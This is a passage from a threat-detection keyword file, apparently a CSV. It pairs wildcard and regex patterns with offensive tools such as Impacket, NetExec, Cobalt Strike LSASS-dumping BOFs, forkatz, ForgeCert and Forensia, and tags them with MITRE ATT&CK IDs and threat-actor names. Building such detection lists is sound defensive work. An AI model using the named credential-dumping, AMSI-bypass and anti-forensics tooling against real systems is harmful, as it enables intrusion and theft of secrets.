SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45205" "*--force-ps32 --obfs --amsi-bypass *",".{0,1000}\-\-force\-ps32\s\-\-obfs\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","45206" "*foreach(`$x in(0..$lwidth)){`$p=`$g.GetPixel(`$x,`$_)*",".{0,1000}foreach\(\`\$x\sin\(0\.\.\$lwidth\)\)\{\`\$p\=\`\$g\.GetPixel\(\`\$x,\`\$_\).{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute. Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. 
It generates a oneliner for executing either from a file or from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","45208" "*foreign_access.cna*",".{0,1000}foreign_access\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45209" 
"*foreign_lsass * *",".{0,1000}foreign_lsass\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","0","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45210" "*foreign_lsass.c*",".{0,1000}foreign_lsass\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45211" "*foreign_lsass.x64*",".{0,1000}foreign_lsass\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45212" "*foreign_lsass.x86*",".{0,1000}foreign_lsass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker 
- Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","45213" "*Forensia.exe -D *",".{0,1000}Forensia\.exe\s\-D\s.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","45214" "*forge_ticket.rb*",".{0,1000}forge_ticket\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45216" "*forge_ticket_spec.rb*",".{0,1000}forge_ticket_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45217" "*ForgeCert.exe*",".{0,1000}ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","45218" "*ForgeCert-main*",".{0,1000}ForgeCert\-main.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","45219" "*Forging a token from a fake Network Authentication 
through Datagram Contexts*",".{0,1000}Forging\sa\stoken\sfrom\sa\sfake\sNetwork\sAuthentication\sthrough\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","45220" "*forkatz.exe*",".{0,1000}forkatz\.exe.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45221" "*forkatz.sln*",".{0,1000}forkatz\.sln.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45222" "*forkatz.vcxproj*",".{0,1000}forkatz\.vcxproj.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45223" "*forkatz-main*",".{0,1000}forkatz\-main.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","45224" 
"*ForkDump-x64.exe*",".{0,1000}ForkDump\-x64\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45225" "*ForkDump-x64.pdb*",".{0,1000}ForkDump\-x64\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45226" "*ForkDump-x86.exe*",".{0,1000}ForkDump\-x86\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45227" "*ForkDump-x86.pdb*",".{0,1000}ForkDump\-x86\.pdb.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45228" "*ForkPlayground-master*",".{0,1000}ForkPlayground\-master.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","45229" "*Format SSSD Raw Kerberos Payloads into CCACHE files.*",".{0,1000}Format\sSSSD\sRaw\sKerberos\sPayloads\sinto\sCCACHE\sfiles\..{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - 
T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","45230" "*-format=dotnet-createsection -sleep*",".{0,1000}\-format\=dotnet\-createsection\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","45231" "*--format-string ziiiiizzzb * ",".{0,1000}\-\-format\-string\sziiiiizzzb\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","45232" "*--format-string ziiiiizzzib *",".{0,1000}\-\-format\-string\sziiiiizzzib\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","45233" "*fortalice/bofhound*",".{0,1000}fortalice\/bofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","45234" "*fortra/CVE-2024-6768*",".{0,1000}fortra\/CVE\-2024\-6768.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in 
CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","1","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","45235" "*fortra/impacket*",".{0,1000}fortra\/impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","45236" "*fortra/No-Consolation*",".{0,1000}fortra\/No\-Consolation.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker 
- RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","45237" "*FortyNorthSecurity/CIMplant*",".{0,1000}FortyNorthSecurity\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","45238" "*FortyNorthSecurity/FunctionalC2*",".{0,1000}FortyNorthSecurity\/FunctionalC2.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - 